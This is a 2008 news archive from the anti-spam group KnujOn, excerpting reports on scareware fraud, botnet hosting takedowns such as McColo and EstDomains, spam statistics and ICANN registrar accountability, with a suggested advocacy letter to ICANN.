News - 2008 Archive
December 31, 2008
A federal judge has fined a Belize-based company $8,000 for each day it continues to flout his order to halt a major internet operation alleged to have duped more than 1 million computer users into buying bogus malware protection.
US District Judge Richard D. Bennett wrote in a ruling late last week that Innovative Marketing is in civil contempt for failing to comply with a temporary restraining order to stop its scareware campaign and turn over financial records. The judge imposed the fines after Sam Jain, the company's chief executive, and four other defendants failed to appear at a hearing.
(theregister.co.uk)
December 30, 2008
For six years CastleCops campaigned against internet fraud by running malware and phishing scam investigations and take-downs. CastleCops also ran volunteer training programs, as well as maintaining other services including computer virus clean-up assistance to ordinary punters.
(theregister.co.uk)
December 29, 2008
In a blow to anti-phishing efforts, the famed CastleCops organization dedicated to fighting spam and phishing quietly shuttered its site last week.
The all-volunteer organization investigated phishing and malware scams, and was credited with successfully derailing many of these attacks and phishing sites. CastleCops itself was also a constant target of distributed denial-of-service attacks and other scams.
(darkreading.com)
December 28, 2008
If 2007 was witness to the rise of the professional hi-tech criminal, then 2008 was the year they got down to work.
"The underground economy is flourishing," said Dan Hubbard, chief technology officer at security company Websense.
"They are not just more organised," said Mr Hubbard, "they are co-operating more and showing more business savvy in how they monetise what they do."
Statistics gathered by firms combating the rising tide of computer crime reveal just how busy professional cyber thieves have been over the last twelve months.
Sophos said it was now seeing more than 20,000 new malicious programs every day. 2008 was also the year in which Symantec revealed that its anti (news.bbc.co.uk)
December 27, 2008
The United States government has issued its own response and evaluation of ICANN's impending plan to open between 200 and 800 new gTLDs for sale at $185,000 per domain and $60,000 per year. Many of the government's concerns (the report contains statements from both Meredith Baker, Acting Assistant Secretary for Communications and Information, and Deborah A. Garza, Acting Assistant Attorney General) mirror those we raised last week.
(arstechnica.com)
December 26, 2008
Nine in ten emails are now spam with an estimated 200bn junk mail messages a day clogging up the internet, according to a new report by networking and security giant Cisco.
Drive-by download attacks - planting redirection scripts on legitimate sites that lead onto hacker controlled websites full of exploits - have become a popular method for spreading all forms of malware, including botnet clients that turn PCs into spam-churning zombies.
The US is the single biggest source of spam, accounting for 17.2 per cent of junk mail. Other big offenders include Turkey (9.2 per cent), Russia (8 per cent), Canada (4.7 per cent), Brazil (4.1 per cent), India (3.5 per cent), South Korea (3.3 per cent), Germany and the UK (2.9 per cent each).
December 25, 2008
A New Zealand man said to be at the helm of one of the world's most prolific spam enterprises has agreed to pay fines totalling $92,715 (about US $63,400) after admitting his role in an operation that spewed billions of junk messages in recent years.
Lance Atkinson, 26, paid the paltry amount "because of his co-operation and candour with authorities at an early stage" according to The Sydney Morning Herald. He could have been forced to pay double that amount. (theregister.co.uk)
December 24, 2008
You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.
(castlecops.com)
December 23, 2008
Commonwealth Security and Risk Management staff have been reviewing multiple reports of newly purchased Universal Serial Bus (USB) storage devices containing malicious software. Our recommendations are included below as some of the vulnerabilities may have significant impact for the Commonwealth Information Security community.
USB storage devices are being contaminated with malicious software prior to delivery to the customer (i.e., somewhere in the period from manufacturing through distribution). The types of USB storage devices found to contain malicious software include USB flash/thumb drives, USB portable hard drives, USB digital photo frames, USB flash-based MP3 players, and USB memory cards. The malicious software installed on the USB storage device could be a virus or Trojan application that may allow a malicious individual to steal information from the computer or expose the computer to additional malicious software. Please be particularly careful during this holiday season due to the high volume of USB storage devices purchased during this time.
(csirc.vita.virginia.gov)
December 22, 2008
"several people have already asked for an app that will let you forward your spam folder to Knujon, SpamCop and the like and there is still nothing to seriously handle spam. Google has a great filter, but filters are an ineffective way of stopping spam (90%+ of all email is spam). The only way to really stop spam is to attack it upstream. I am going to ask for this until a solution arrives." (groups.google.com)
December 21, 2008
"While many bloggers and mainstream tech pundits are pulling together their legitimate “Best of 2008” column or “Trends for 2009” predictions, I thought I’d take a different approach this holiday season. I’d like to send best holiday wishes to those tireless workers (and their army of 24/7 zombie computers) who craft the spam that fills up our in-boxes.
...
10) (And last but seriously) Kudos to the folks at Knujon for doing a great job of reducing spam for all of us!"
(blogs.zdnet.com)
December 19, 2008
"Our research has revealed a smoking gun that shows that Storm and other botnet spam generates commissionable orders, which are then fulfilled by the supply chains, generating revenue in excess of $150 million per year."
-Patrick Peterson, vice president of technology at IronPort
IronPort's research revealed that more than 80 percent of Storm botnet spam advertises online pharmacy brands. This spam is sent by millions of consumers' personal computers, which have been infected by the Storm worm via a multitude of sophisticated social engineering tricks and web-based exploits. Further investigation revealed that spam templates, "spamvertized" URLs, website designs, credit card processing, product fulfillment and customer support were being provided by a Russian criminal organization that operates in conjunction with Storm.
(ecommerce-journal.com)
December 18, 2008
In most cases, pharmacies offering drugs without a prescription or a doctor’s review are fraudulent and illegal. What is more, they may have nothing to do with the pharmaceutical industry at all and instead act as spam or malware agents.
(ecommerce-journal.com)
December 17, 2008
Until Microsoft finds a fix for a security flaw in Internet Explorer that could allow criminals to take control of computers and steal passwords, experts are warning people to use a different browser.
Microsoft said at least seven versions of its popular Internet Explorer web browser, which is used by most of the world's computers, are vulnerable to this security flaw. About 10,000 websites have been compromised so far as Microsoft races to find a security patch.
(allheadlinenews.com)
Microsoft: Big Security Hole in All IE Versions (washingtonpost.com)
December 16, 2008
The big picture, according to [ScanSafe], is that we'll see more of the same, in particular greater volumes of Web-borne malware, over the next year -- with many of the more narrowly targeted varieties expected to arrive as campaigns aimed at companies handling real money, such as banks and credit card processors.
ScanSafe predicted that customized threats targeted at publicly-held companies will likely continue to rise in '09, though it said that many of those attacks will actually be aimed at stealing valuable intellectual property, versus personal data. A full range of threats including everything from rootkits to password stealers will be enlisted to that end, the researchers said.
Overall, users will likely be exposed to a rising rate of 6 percent more Web-based attacks per month across 2009, the experts said. That equates to a 16 percent increase in attacks over the course of the entire twelve months.
(eweek.com)
December 15, 2008
Attorney General Michael Mukasey said the long-running and far-reaching case began with a single lead from Australian police in what became known as Operation Koala in Europe and Operation Joint Hammer in the United States.
"From that initial horrible discovery, the investigation grew to reveal connections in nearly 30 countries around the world," Mukasey said.
19 arrested over 'worst ever' internet child porn bust (computerworld.co.nz)
23 Australians caught in global child porn ring bust (livenews.com.au)
December 14, 2008
It was observed that one month after McColo went offline, spam volumes were nearly back to the levels seen prior to the company’s takedown by its upstream Internet providers. However, as one fraud expert noted, spam wasn’t the only activity hosted by McColo Corp. Evidence began to appear that retail fraud also dropped significantly on the same day. In fact, Ori Eisen, founder of 41st Parameter, observed that about a quarter of a million dollars' worth of fraudulent charges the company faced every day came to a halt.
(ecommerce-journal.com)
December 13, 2008
Internet security is broken, and nobody seems to know quite how to fix it.
Despite the efforts of the computer security industry and a half-decade struggle by Microsoft to protect its Windows operating system, malicious software is spreading faster than ever. The so-called malware surreptitiously takes over a PC and then uses that computer to spread more malware to other machines exponentially. Computer scientists and security researchers acknowledge they cannot get ahead of the onslaught.
(nytimes.com)
December 12, 2008
Power has been shut down to Coldrain.net by an ice storm.
Coldrain.net may be down for the weekend. Junk samples can still be uploaded to KnujOn.com
December 8, 2008
Anyone who has actually taken the time to look at their junk email may notice many spams in Russian or other Cyrillic-alphabet languages. The non-Russian-speaking spam victim probably wonders what they are looking for. Well, in many cases they are recruiting spammers to advertise the human traffic trade. clickcashmoney.com wants to hire affiliates to push dosug.nu, paying them for the number of clicks they deliver.
dosug.nu offers “virtual sex”, but directs visitors to elitegirls.nu which has “galleries” of girls asking 13000-30000 Rubles for an hour (about $500-$1100).
While this appears to be an Eastern European operation, clickcashmoney.com is sponsored by INTERCOSMOS MEDIA GROUP in the United States, and the other two .NU sites are as far from the Volga as possible. The tiny island of Niue (.nu) is no stranger to international intrigue, allowing owners of corporate trusts to remain secret, a frequent tool of money launderers. However, the owners of these sites purport to be in another island nation, Cyprus, with the sites actually being hosted in the Netherlands. Confused yet? That's the point.
The breakup of the old Soviet Union, the lawlessness of the 1990s and a booming economy have made human sexual trafficking fairly common in the former Soviet republics. Prostitution is now big business in Russia and they are looking for spammers to promote the illicit traffic.
December 5, 2008
Spam continues to plague the Internet because a small number of large Internet Service Providers sell service knowingly to professional spammers for profit, or do nothing to prevent spammers operating from their networks.
Although all networks claim to be anti-spam, some network executives factor revenue made from hosting known spam gangs into corporate policy decisions to continue to sell services to spam operations. Others simply decide that closing the holes in their end-user broadband systems that allow spammers access would be too costly to their bottom lines.
The majority of the world's service providers succeed in keeping spammers off their networks and work to maintain a positive anti-spam reputation, but their work is undermined daily by the few networks who, out of corporate greed or mismanagement, choose to be part of the problem. The world's worst spam problem networks today are:
(spamhaus.org)
December 4, 2008
Italian president and media baron Silvio Berlusconi said today that he would use his country's imminent presidency of the G8 group to push for an international agreement to "regulate the internet".
Speaking to Italian postal workers, Reuters reports Berlusconi said: "The G8 has as its task the regulation of financial markets... I think the next G8 can bring to the table a proposal for a regulation of the internet." (theregister.co.uk)
December 3, 2008
Banks and online payment systems have been hacked before, but not quite like this. Rather than an attack on a website or corporate network, this was an intrusion into the payment site's Registrar account at Network Solutions. The intruder changed where the website would resolve to, so instead of customers logging into the real location they were handing their credentials to a server in the Ukraine which attempted to deploy malware on the visitor’s computer. As we have discussed before, Registrars have enormous power and control over the Internet, but questions about their duties and responsibilities remain open. Registrars will often claim they simply sell domain names and have no control over their use, but the creation of a domain name opens unlimited access, and this must be viewed with a note of caution.
Online payment site hijacked by notorious crime gang
(theregister.co.uk)
Hackers Hijacked Large E-Bill Payment Site (washingtonpost.com)
December 2, 2008
SpamCop & KnujOn Complement One Another
The aged may remember that in posts long ago I had mistakenly been attempting to use SpamCop to perform the services of KnujOn. KnujOn appears interested in illicit spam, preventing the stealing of identities (and USD 600 million per annum, and lives taken by counterfeit medicines). However, the wheels of justice grind slowly (if at all). Reports of KnujOn's becoming personae non grata at ICANN are most encouraging, however. (Jon Postel is likely rolling in his grave at ICANN's choice to ignore crime.)
SpamCop blocks spam, quickly: as a side-effect, it reports the site's activities (to everyone up to ICANN, I wish) in a letter. I don't know whether it places the illicit store's site on the SCBL before it can claim more victims; but I hope it does. Both KnujOn's and SpamCop's services are important for me to use.
(spamcop.net)
December 1, 2008
In what can only be an act of angry revenge, websites are popping up with text from various news articles about KnujOn that redirect the user's browser to sites spreading malware. The sites are either using fake anti-virus scareware or fake media updaters.
klasik-mine.tryki.bij.pl/knujon.html --> myprivatetubes2009.net
n-sync.tryki.bij.pl/knujon.html --> antivirusbest-scan.com
3d-watch.miko.bij.pl/knujon.html --> antivirusdefense.com
November 30, 2008
After being stranded for weeks, a monster botnet responsible for an estimated 40 percent of the world's spam was able to briefly reconnect to its mothership in a tense international duel playing out online that could have a dramatic effect on the amount of junkmail flowing into inboxes everywhere.
The rogue network dubbed Srizbi was able to establish ties to a new master control channel using an emergency mechanism built into the 500,000 or so machines infected by the bot. Bot herders designed the pseudo-random domain name generator for the event that their network got disconnected from the previous channel. That's precisely what happened earlier this month, when a network provider known as McColo was yanked offline.
(theregister.co.uk)
November 29, 2008
Social networking site Facebook today won an $873 million court judgment against a spammer who has been routinely deluging the site with sales pitches and sexually explicit messages.
According to an Associated Press report, the judgment against Adam Guerbuez of Montreal is the largest ever awarded under the U.S. CAN-SPAM Act. The award is more than three times as much as Facebook will gross in revenue this year.
Facebook doesn't expect to collect the money; the report states that Guerbuez has been "difficult to find" since he was sued in August. But social networking sites are hoping that such a large judgment will deter other spammers from abusing their sites.
(darkreading.com)
November 28, 2008
Since all the publicity, their operations split up and moved to several other parts of the world, such as China or Turkey. But apparently this kind of hosting is also present in some more Western parts of the world. A research paper has been released that describes some of the activities located at a California-based ISP.
(blog.security4all.be)
November 27, 2008
Last week, there was a lot of attention over the shutdown of McColo, a hosting company that was apparently used by a huge number of spammers to control some of the largest zombie botnets out there. While we were initially skeptical of just how big an impact this had (the press and some antispammers have "cried wolf" way too many times in the past on the impact of shutting down certain spam operations), the evidence in the days that followed suggested, indeed, that an awful lot of the world's spam was controlled via McColo. The Washington Post, which kicked off the shutdown by presenting evidence of McColo's spam connections to its upstream providers, is now digging deeper into how the whole operation worked.
(techdirt.com)
November 26, 2008
We have received official notice that EstDomains' accreditation was terminated November 24 and all domains held by EstDomains will be transferred to Directi by no later than December 2nd.
History
281,000 Domains to be Transferred from EstDomains to Directi (icann.org)
ResellerClub to Take Over EstDomains-Sponsored Domain Names (news.softpedia.com)
Termination of Registrar EstDomains to Go Ahead (icann.org)
EstDomains Termination Delayed (icann.org)
ICANN Termination Letter 12 November 2008 (icann.org)
ICANN De-Accredits EstDomains for CEO's Fraud Convictions (voices.washingtonpost.com)
ICANN Terminates Accreditation of Notorious Malware Hosting Domain Registrar EstDomains (news.softpedia.com)
Three cheers for ICANN! (avertlabs.com)
RBN Farewell To Estdomains (rbnexploit.blogspot.com)
One criminal Internet registrar down... (weblog.infoworld.com)
USA Internet community fighting against botnet purveyors
Phishing and Fraud - ICANN Heeds Call to Ban Abusive Registrars
InterCage Back Up - Blames EstDomains for Their Woes
KnujOn.com Calls on Internet Community to End the Fake Pharmacy Menace
More Follow-up And Fallout
EstDomains Continues to Deny Real Location
EstDomains: A Sordid History and a Storied CEO
Atrivo and ESTDomains
Directi Responds to KnujOn Report - Dumps Controversial Service
EstDomains Controversy Continues
SpamHaus Backs-Up HostExploit Report/Wash Post Article
Examining the Role of Registrars in Illicit Activity
Underground Steroid Websites Flourish at U.S. Registrars
Steroid Sites Registered Through EstDomains
November 24, 2008
(senderbase.org)
November 22, 2008
Many of the domains maintained by EstDomains are used in illegal operations.
Following their decision to terminate the registrar accreditation agreement for EstDomains, ICANN (Internet Corporation for Assigned Names and Numbers) was looking for registrars interested in receiving a bulk transfer of all the domains maintained by the Estonian company. It looks like that registrar will be Directi-owned ResellerClub, which already started sending notification e-mails regarding the upcoming change to EstDomains customers.
EstDomains is a company that up to this point functioned as an ICANN-accredited domain name registrar. Originally founded in Estonia, the company is also incorporated in Delaware, US, and became the subject of work by many security groups because it provided domain registration services to numerous cybercriminal gangs. The company was named in multiple reports from the anti-spam group KnujOn and in HostExploit's extensive Atrivo – Cyber Crime USA report.
(news.softpedia.com)
Dodgy Domains Dumped by ISPs (pcworld.com)
November 19, 2008
LegitScript is pleased to announce that in the last month, and mostly in the last week, LegitScript has been able to effectuate the shut-down of nearly 500 "rogue" Internet pharmacies. All of the websites were no-prescription-required online pharmacies. All violated several laws and/or accepted medical or pharmaceutical safety standards. For example:
- All of the websites dispensed prescription drugs, sometimes controlled substances, without requiring a valid prescription.
- Most of the drugs were not FDA-approved, by virtue of being illegally imported into the US. In some cases, the drugs were believed to be counterfeit or adulterated.
- Some of the websites sold anabolic steroids without requiring a valid prescription.
- Many of the websites violated intellectual property laws ("brandjacking"), including trademark laws, in the US and other countries.
Until recently, domain name registrars have declined to terminate a website unless it was engaged in spam or sending out viruses, or unless there was a court order to do so, sometimes arguing that it is outside of their ability to do so. The point of what we've done is to show that registrars have the technical, contractual and legal ability to shut down these websites. And, we're pleased to report that we have had success in shutting down some of these rogue Internet pharmacies even when the registrar and the website registrant are both located outside of the United States.
We also want to acknowledge the hard work and assistance of knujon.com in this endeavor. The websites that have been shut down are a small portion of those actively operating. As the threat of prescription drug abuse and counterfeit drugs continues, LegitScript looks forward to continuing to work with your organization to reduce prescription drug abuse, enhance prescription drug safety and integrity, and improve Internet security.
(legitscript.com)
November 18, 2008
McColo, a network provider that was yanked offline following reports it enabled more than half the world's spam, briefly returned from the dead over the weekend so it could hand off command and control channels to a new source, security researchers said.
The rogue network provider regained connectivity for about 12 hours on Saturday by making use of a backup arrangement it had with Swedish internet service provider TeliaSonera. During that time, McColo was observed pushing as much as 15MB of data per second to servers located in Russia, according to Paul Ferguson, a security researcher for anti-virus software maker Trend Micro.
The brief resurrection allowed miscreants who rely on McColo to update a portion of the massive botnets they use to push spam and malware. Researchers from FireEye saw PCs infected by the Rustock botnet being updated so they'd report to a new server located at abilena.podolsk-mo.ru for instructions. That means the sharp drop in spam levels reported immediately after McColo's demise isn't likely to last.
(theregister.co.uk)
KnujOn at VirusBuster (virusbuster.hu)
November 17, 2008
What's remarkable about the McColo and Intercage shutdowns is that they weren't initiated by law enforcement officials or via court order. Neither did they happen because either company was forced into bankruptcy or had other financial problems. Instead, both companies were forced offline when their upstream ISPs, acting upon information provided by security researchers, simply disconnected them and their customers from the Internet.
Others, though, say that the only people really opposed to the efforts of antispam and anti-malware groups are the cybercriminals themselves and those who support them for financial gain -- such as service providers that host spam sites. In addition, in the cases of both the McColo and Intercage shutdowns, the only role the security community played was to collect evidence showing conclusively that the two companies were hosting clients involved in all sorts of criminal activity, said Garth Bruen, founder of the antispam group KnujOn.
The actual decisions to pull the plug on the hosting companies were made by their service providers, not by the security researchers, Bruen said. "That was their choice to do it," he noted. "We just gave them the information to help them make up their mind."
Such cooperation between security researchers, ISPs and hosting companies can be very useful, according to Bruen. He pointed to a "very long dialogue" that KnujOn and HostExploit.com had with a large India-based hosting company named Directi that resulted in the latter agreeing to suspend "thousands and thousands" of domains that were allegedly being used to send spam or sell counterfeit drugs.
(computerworld.com)
Ragtag team ends 75% of all spam (indiatimes.com)
Get Your KnujOn - On (lockergnome.com)
November 16, 2008
During a presentation by Dr. Robert Bruen at ICANN's Cairo meeting, in which he was discussing the need for more due diligence and better accounting in the Domain Name System, a Registrar representative complained that it was impossible for them to verify the accuracy of all domain registrations. Some Registrars have as many as 7 million records and that is just "too many" to check. At KnujOn we find this statement laughable for several reasons. Banks and credit card companies process verifications on this scale regularly, and KnujOn has calculated that we could verify the entire record set within a week. Shame on the Registrars for throwing out such a weak dismissal. Unfortunately, this was in line with the general response to KnujOn by the Registrars at this meeting.
Top501 IT: McColo shutdown won’t stop spam, malware, warn security experts (articles.top501.nu)
November 15, 2008
Microsoft Corp. founder Bill Gates' 2004 proclamation that the spam problem would be solved within two years has proved a bitter joke, with unsolicited messages doubling yearly to make up about 90% of mail transmitted on the Internet.
But this week, the tide turned. The number of unwanted, offensive and misleading e-mails sent across the globe plummeted by about two-thirds, to a mere 60 billion or so a day by Thursday, according to spam filtering companies.
The surprising respite had very little to do with the hundreds of millions of dollars that corporations and consumers have spent on anti-spam software or with the lawsuits and criminal cases brought against spammers in the last decade.
Instead, a ragtag band of researchers pulled off the unprecedented coup of drastically cutting the spam volume by adopting a new strategy: going after mainstream U.S. companies that can unknowingly help spammers, identity thieves and child porn purveyors by carrying their traffic on the Internet.
(latimes.com)
Spam plummets as gang leaves net
The closure of a web hosting firm that is believed to have had spam gangs as clients has led to a drastic reduction in junk mail. (news.bbc.co.uk)
November 14, 2008
"There are a dozen other shady pieces still out there that are not yet 'active,'" said Bruen. "The spammers are mercenaries. They get paid to promote a product, an illicit product. The people who pay them are going to demand better results or a refund, and the people paying them aren't very nice people, they're people with guns."
Bruen said that he and others are currently working on more research projects that will further unveil shady ISPs that host fraudulent and other illegal Web sites. And contrary to popular conceptions, numerous Internet providers hosting spam are actually located on U.S. shores, as opposed to being off-shore cyber criminals, Bruen said.
"We've been following a twisty road for several years and it did not necessarily lead us to dead ends and mysterious players. It led us to major Internet players and many in the United States," he said. "The next round [of research] may be even more shocking."
(crn.com)
Rogue and Fraudulent Security Software and Websites a Growing Threat
In my opinion the problem of rogue and fraudulent security software is quickly approaching epidemic proportions. I have seen a dramatic rise in the number of fraudulent applications and websites in the past few months to where there isn't a day that goes by where I don't come in contact with one or see one pop up. It used to be maybe once a month or so. And everybody is getting infected: my friends, relatives, co-workers, everyone is falling victim. Trend Micro says that 10 percent of all infections they see are caused by rogue software. (securityblahblah.blogspot.com)
November 13, 2008
The termination of ICANN-accredited registrar EstDomains is to go ahead, effective 24 November 2008.
On 28 October 2008, ICANN sent a notice of termination to EstDomains, Inc. (EstDomains) based on an Estonian Court record reflecting the conviction of EstDomains' then president, Vladimir Tsastsin, of credit card fraud, money laundering and document forgery.
Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, "Any officer or director of [a] Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances."
ICANN received a response from EstDomains on 29 October in which it indicated that the Estonian Court record on which ICANN relied was not final and had been appealed. ICANN pended the termination of EstDomains' RAA to analyze the claims made by EstDomains and to obtain independent information regarding the status of the alleged appeal.
On 7 November 2008, EstDomains was informed that, based on ICANN's findings, ICANN was proceeding with the termination of EstDomains' RAA, effective 24 November 2008.
(icann.org)
Spam Volumes Drop by Two-Thirds After Firm Goes Offline (washingtonpost.com)
November 12, 2008
[Knujon contributed to this report]
HostExploit presents the second CYBER CRIME USA report which highlights those Internet players that currently host the world’s major spam botnets (an estimated 50% of spam worldwide), malware, rogue PC security products, cybercrime affiliate payment systems, and child pornography. This study from HostExploit.com is based on tracking and documenting ongoing cyber criminal activity. As a result of the first report focusing on Atrivo / Intercage and subsequent community actions, there was a quantitative drop of 10% of spam and malware worldwide. While temporary, it does clearly demonstrate that with a concerted and consistent effort by concerned commercial Internet network operators, a safer Internet can ensue.
On this occasion we focus on McColo and others that, like Atrivo / Intercage, actually operate from servers and depend on US transit peers. This open source security study sets out to quantify and continuously track cyber crime using numerous methods of measurement. In addition to original quantitative research and analysis, the study draws upon and welcomes the findings of other research efforts. What emerges is a picture of a front for cyber criminals who specifically target consumers in the United States and elsewhere. It provides hard data regarding specific current activity within McColo and associated networks, explains how consumers are targeted, and describes McColo's virtual network structure.
The philosophy behind the study is that we as an Internet community act in accordance with the ACM (Association of Computing Machinery) code of ethics, e.g. avoiding harm to others. "Harm" means injury or negative consequences, such as undesirable loss of information, loss of property, property damage, or unwanted environmental impacts. This principle prohibits use of computing technology in ways that result in harm to Internet users and the general public. It is the Internet security community’s responsibility to blow the whistle. While we do not take the actions to ‘stop’ the cyber criminals, we do urge those who provide connectivity or peering to consider this report and their role.
(hostexploit.com)
Web Hosting Firm Shuttered After Connection to Spammers is Exposed
The gleaming, state-of-the-art, 30-story office tower in downtown San Jose, Calif., hardly looks like the staging ground for a full-scale cyber crime offensive against America. But security experts say a relatively small Web hosting firm at that location is home to servers that help manage the distribution of the majority of the world's junk e-mail.
The servers are owned by McColo Corp, a Web hosting company that has emerged as a major U.S. base of operations for a host of international cyber-crime syndicates, involved in everything from the remote management of millions of compromised PCs to the sale of counterfeit pharmaceuticals and designer goods, fake security products and child pornography.
Multiple security researchers have recently published data naming McColo as a mother ship for all of the top robot networks or "botnets," which are vast collections of hacked computers that are networked together to blast out spam or attack others online.
Joe Stewart, director of malware research for Atlanta based SecureWorks, said that these known criminal botnets: "Mega-D," "Srizbi," "Pushdo," "Rustock" and "Warezov," have their master servers hosted at McColo.
Officials from McColo did not respond to multiple e-mails, phone calls and instant messages left at the contact points listed on the company's Web site. But within hours of being presented with evidence from the security community about illegal activity coming from McColo's network, the two largest Internet providers for the company decided to pull the plug on McColo late Tuesday.
Global Crossing, a Bermuda-based company with U.S. operations in New Jersey, declined to discuss the matter, except to say that Global Crossing communicates and cooperates fully with law enforcement, their peers, and security researchers to address malicious activity.
(washingtonpost.com)
November 11, 2008
A U.S. based Web hosting firm that security experts say was responsible for facilitating more than 75 percent of the junk e-mail blasted out each day globally has been knocked offline following reports from Security Fix on evidence gathered about criminal activity emanating from the network.
For the past four months, Security Fix has been gathering data from the security industry about McColo Corp., a San Jose, Calif., based Web hosting service whose client list experts say includes some of the most disreputable cyber-criminal gangs in business today.
(washingtonpost.com)
November 10, 2008
We're back in business, thanks for hanging in there folks!
November 9, 2008
Our apologies if your submissions are being rejected, it should be resolved shortly.
November 5, 2008
In an unusual and shocking move Dr. Robert Bruen was interrupted and silenced at an open, cross-function ICANN meeting in Cairo Monday. At a meeting entitled "Open Joint Session (GNSO, ccNSO, GAC, ALAC): Domain Name Space”, Dr. Bruen was handed the microphone in the question and answer portion. As he began speaking about the problems of compliance and the need for better controls within the expanding Internet, specifically in relation to criminal infiltration of the Domain Name space, Patrick Sharry (ICANN ccNSO Consultant) stopped Dr. Bruen and said: "I don't want to pursue it any more in this forum."
Chris Disspain (CEO of Australian Domain Administration) followed this rare dismissal by saying: “[if] it turns into an open microphone, then I, for one, won't be supporting it again.” In other words, he would no longer support question and answer portions at ICANN sessions.
This was quite a shock after several other attendees were able to ask lengthy questions uninterrupted. However, Dr. Bruen should have known he was walking on thin ice. Once he introduced himself as a KnujOn representative Patrick Sharry told him to “keep it brief.”
This is somewhat reminiscent of Peter Dengate-Thrush’s response to questions from KnujOn’s Garth Bruen at the Washington D.C. ICANN Session entitled “Improving Institutional Confidence consultation”. KnujOn brought up issues of criminality, contract violations, and exclusion of the Internet consumer. Dengate-Thrush admonished Bruen that “this was not relevant to institutional confidence.” Later at this same session Dengate-Thrush told the audience that he did not “want to hear from any more angry IP lawyers.” Many of the attendees were attorneys representing brand holders being exploited by cyber-squatters and counterfeiters. The Intellectual Property community expressed its feeling of being marginalized by ICANN in favor of shadowy criminal interests.
So, as at the Cairo meeting, open forums only seem open if the panel wants to hear the question. The summary dismissal of Dr. Bruen can only be seen as prejudiced, as it violates Sharry’s own ground rules for the session:
“…our joint SO and AC meeting is focusing on new gTLDs, IDN ccTLDs, and issues that run across that space.”
Dr. Bruen’s unasked and unanswered question concerned the fact that the existing compliance structure is inadequate: how can ICANN ensure contractual compliance is enforced in a rapidly expanded Internet?
Furthermore, Sharry opened the session with this commitment:
“We will try, as we do that, on the way through, to involve a little bit of at least conversation, if not a little bit of conflict or argument or heated debate or discussion or something like that is(sic) well. And we will see how we go then, bringing the audience into that conversation.”
But, as we can see, no debate or discussion was allowed.
Since the serious issue of Registrar Secrecy has emerged, we simply want to know if this will be allowed to continue within the new Domain Registrar space or whether common-sense policy will be implemented.
If the issues of contract violations, criminality in the Registrar community, and exclusion of the consumer are not relevant to improving institutional confidence, then what is?
KnujOn will be contacting Sharry and Disspain directly, as well as ICANN’s Ombudsman, to get a better explanation. We are speaking on behalf of the consumer and won't be silenced.
Should Internet registrars be transparent? Let ICANN know! (infoworld.com)
Where Are the Registrars? (eweek.com)
ICANN De Facto Sanctioning of Domain Registrar Secrecy? (eweek.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 3, 2008
Last Friday, ICANN listed six steps being taken to ensure that the provisions of the RAA with regard to WHOIS information are followed correctly. And in nearly every article we have published here at The Industry Standard about ICANN policy, we are reminded that the public can recommend changes to the RAA, which is currently undergoing revision.
What is most interesting about the ICANN WHOIS focus, is that the registrars themselves are not subject to the same strict information regulation. One of the easiest ways to spot spammers, malware distributors, or other illegal activity associated with domains online has been the ability to check a registrant's WHOIS information. Falsified or missing information is often an indicator of a fly-by-night registrant, or one unwilling to provide real information due to their unscrupulous activities. As a result, false information is one of the biggest complaints concerning ICANN's registrar enforcement; the Registrar Accreditation Agreement (RAA) requires that registrars get complete and verifiable information from the customers they register.
(thestandard.com)
Where Are the Registrars? (eweek.com)
ICANN De Facto Sanctioning of Domain Registrar Secrecy? (eweek.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 2, 2008
So many of the problems we are experiencing on the Internet (spam, phishing, counterfeit product traffic, malware distribution, network intrusions, online fraud, etc.) are enabled by secrecy within the service provider community, specifically among certain Registrars. Note some of the following recent issues:
In any other industry, this would be intolerable. Unfortunately, there is no provision in the Registrar Accreditation Agreement (RAA) that requires a Registrar to disclose their location. Several unscrupulous companies have taken advantage of this fact by deeply burying their location information and misdirecting the public to dead ends and red herrings. Consumers who complain to Registrars often find themselves ignored or even abused by Registrar staff.
You Can Help
The RAA is being re-written at this very moment. YOU as an Internet user and consumer have an opportunity to close a huge loophole that allows an unaccountable atmosphere to fester. In order to assist ICANN in achieving its stated goal of transparency and accountability, we propose a modification to the Registrar Accreditation Agreement (RAA), the core contract ICANN uses to issue certifications to Registrars. A review of the RAA is currently underway and KnujOn is seeking that the following language (or equivalent) be added to the RAA:
"All Accredited Registrars must submit main office location, including country, to be publicly disclosed in ICANN web directory. Post Office boxes, Incorporation addresses, and mail-forwarding locations will not be acceptable. Registrars must also provide for public display the name of CEO or President. ICANN must be notified within 30 days of a location or presiding officer change.”
This is suggested language. Any version that addresses the issues discussed above and meets the requirements of public disclosure would be acceptable.
If you wish to support this proposal, please write a brief and polite email as an Internet user to policy-staff@icann.org expressing your concern about the lack of public Registrar disclosure and request that the new version of the RAA include a section requiring owner and location disclosure. You may use the suggested language above, your own version, or simply a personal statement of concern over the issue. Anyone uncomfortable with contacting ICANN directly can forward their comments to KnujOn at contact@knujon.com and we will include your comments anonymously in a letter from KnujOn.
Suggested Letter
To: policy-staff@icann.org
Subject: Ending Registrar Secrecy in RAA
Dear ICANN RAA Consultation Staff,
I am writing to you to request a change in the Registrar Accreditation Agreement that will improve transparency and accountability. It has come to my attention as an Internet user that there is no requirement in the standard Registrar contract that requires public disclosure of Registrar ownership or location. I am concerned that this loophole in the agreement opens the door to fraud, secrecy and consumer abuse. Please consider adding the following language or equivalent to the RAA:
"All Accredited Registrars must submit main office location, including country, to be publicly disclosed in ICANN web directory. Post Office boxes, Incorporation addresses, and mail-forwarding locations will not be acceptable. Registrars must also provide for public display the name of CEO or President. ICANN must be notified within 30 days of a location or presiding officer change.”
Without public disclosure there cannot be true transparency, accountability or trust. I appreciate your consideration.
Sincerely, YOUR NAME
You may also send these comments to the RAA Working Group here: raa-wg@atlarge-lists.icann.org OR
Submit comments through the ICANN contact form: http://www.icann.org/cgi/contact OR
